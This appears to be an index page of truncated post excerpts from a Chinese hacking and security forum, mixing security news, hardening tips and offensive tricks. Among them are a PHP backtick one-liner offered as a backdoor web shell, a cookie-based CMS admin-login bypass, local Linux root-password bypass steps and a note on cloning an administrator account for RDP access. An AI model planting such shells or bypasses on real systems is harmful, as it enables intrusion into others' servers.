千博企业程序-一个防注入的小白错误
If EnableStopInjection = True Then If Request.QueryString <> "" Then Call StopInjection(Request.QueryString) If Request.Cookies <> "" Then Call StopInjection(Request.Cookies) If Request.Co...
高危IIS6.0 文件名解析漏洞 终极解决办法!
我之前就发现这个漏洞,我也无奈,后来我想到了rewrite这个东西,它可以用正则表达式匹配URL进行处理。 http://webshell.cc/dir.asp/diy.jpg 比如这就是个diy.asp被更改成图片的文件 IIS6.0的漏洞可以运行它。 我的解决办法: 我在 http://webshell.cc/ 下弄了个图片,上面写的警告信息 http://webshell.cc/no.jpg...
赛门铁克称黑客组织Anonymous被黑 后者否认
据国外媒体报道,赛门铁克发布的一份报告称,黑客组织Anonymous的成员可能已在不知不觉中下载了一款ZeuS特洛伊木马程序,从而让其他黑客能够访问到他们的银行账户信息。但是,Anonymous声称赛门铁克的报告“纯属无稽之谈”。 赛门铁克认为,黑客组织Anonymous的成员被骗下载了一款ZeuS特洛伊木马程序,该程序泄漏了他们的银行账户信息和其他个人信息。赛门铁克在其博客上称,在1月2...
搜一次 cms php 通杀
洞文件 admin 目录下的 admin_loginstate.php 看代码 if(empty($_COOKIE['S_AdminID'])){ echo "<script>window.location='admin_login.php'</script>"; exit; } elseif($_COOKIE['S_Login']!=md5($_COOKIE['S_Adm...
凤凰网被脱裤?
传说N不知道N了多久前凤凰网源码被人盗取连裤子也没剩下 不知真假 群里有人上图:
一个官方没有公布的php秘籍,可用作后门
发现这个也是巧合,我就直接说了吧 <?php //t.php $test = $_GET['r']; echo `$test`; ?> 大家看看这个代码有木有问题? 这里是我们自己的交流平台,是属于我们90sec所有成员的技术分享平台! 我想大家都会说没有问题,但是细心的朋友也会发现下面的变量被一个符号包起来了,既然是变量为什么要这样了, 信息安全团队 而且又不是单引号,这个就是关键所...
Linux系统各版本的本地root密码破解方法
这段时间老碰到有人问及各个linux版本的本地root密码破解方法,我这里自己以及在网络上搜集了些资料,希望对看到了这文章而又恰好用得到的技术人员有点帮助: (一)RedHat/CentOS/Fedora 系统密码破解 1.在grub选项菜单按E进入编辑模式 2.编辑kernel 那行最后加上S (或者Single) 3.按B,启动到single-user mode 4.进入后执行...
C#语言病毒旨在攻击.Net 17岁荷兰美媚黑客一举成名
3月1日,几家反病毒公司同时收到了一种名为“Sharpei”的新型病毒复本,这种病毒基于微软最新型的计算机语言C#编写,它设计用于感染那些装有.Net系统的计算机。 反病毒公司Network Associates认为该病毒的危险程度仅为“低级”,但表示这已是第二种试图对.Net系统产生危害的新型病毒。Network Associates公司反病毒紧急事故应因小组的负责人文森特-古罗特表示:“即便不...
为了dede系统安全把data目录迁移到web以外目录
data目录是系统缓存和配置文件的目录,一般都有可以读写的权限,只要是能够写入的目录都可能存在安全隐患,很多站长甚至给予这个目录可执行的权限,更是非常危险,所以我们建议将这个data目录搬移出Web可访问目录之外。本篇将介绍如何将data目录搬移出Web访问目录。 1.将data目录转移到非Web目录 我们这里举例“D:\dedecms\v57”为我们系统的根目录,我们需要将目录下的data文件夹...
解决管理组登陆3389没权限的问题
登陆3389的时候说没在远程组。加上远程组,还是不行, 本身已经是管理员了,以前也碰到这种问题,多是直接克隆 进去的,这次我是要开VPN。因为克隆管理员进去开VPN有的时候会 出错,开不了。所以嘛~~~~~~~搞了半天后解决了。 解决方法如下: 1. “控制面板” –> “管理工具” –>...